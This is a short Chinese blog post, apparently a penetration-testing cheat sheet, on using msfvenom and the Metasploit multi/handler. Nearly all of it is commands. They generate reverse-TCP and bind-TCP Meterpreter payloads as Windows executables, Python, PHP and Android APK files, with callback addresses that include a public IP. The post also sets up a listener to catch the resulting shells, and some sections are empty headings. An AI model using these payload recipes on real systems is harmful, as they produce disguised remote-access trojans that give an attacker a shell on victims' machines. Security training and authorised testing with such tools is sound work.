0e0w

内网渗透之msfvenom

2020-06-04
0e0w

这是一篇关于msfvenom文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建时间为2020年6月4日,最近一次更新时间为2020年9月15日。本文会不定期更新。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。

关于什么是msfvenom?更多详细内容见 msfvenom官网如何使用

01-msfvenom概述

基础介绍

msfvenom一般需要配合msf进行利用。使用msfvenom生成shellcode,使用msf进行监听,在靶机上运行shellcode。msfvenom几乎支持生成各种平台的shellcode。是后渗透测试过程中强大的武器之一。

安装方式

msfvenom是msfpayload和msfencode的组合,安装msf之后便可使用。

一键安装msf

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && ./msfinstall

更新msf

sudo msfupdate

02-msfvenom命令

  • msfvenom -h #查看帮助
  • msfvenom -l payloads #查看支持生成的payload
  • msfvenom -l archs #查看支持的系统架构
  • msfvenom -l platforms #查看支持的平台
  • msfvenom -l encrypt #查看所有的加密方式
  • msfvenom -l encoders #查看所有的编码器

例:

msfvenom -a 系统架构 –platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp lhost=111.231.228.112 lport=6059 -i 3 -e x86/shikata_ga_nai -f exe -o x86reverse_tcp.exe

03-msfvenom利用

MSF监听器

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp #设置成payload的模式
  • set rhost 111.111.111.112
  • set lport 6095
  • exploit -j

sessions操作

  • sessions -i 2
  • shell

Windows exe

靶机无公网ip

  • msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f exe -o x86reverse_tcp.exe
  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f exe -o x64reverse_tcp.exe

靶机有公网ip

  • msfvenom -p windows/x64/meterpreter/bind_tcp lport=6095 -f exe -o bind_tcp.exe

Linux elf

Python

靶机无公网ip

  • msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f py -o x86reverse_tcp.py

靶机有公网ip

  • msfvenom ­-p windows/x64/meterpreter/bind_tcp lport=6095 ­-f py -o exp.py

PHP

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=111.111.111.112 LPORT=6095 -f raw -o session.php

Android

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=111.111.111.112 LPORT=80 -o msf.apk

apple_ios

04-参考链接

  • https://blog.csdn.net/caiqiiqi/article/details/84102629

本文为0e0w原创文章,转载参考引用时请在文章中添加本站域名(0e0w.com)信息。


文章评论

Content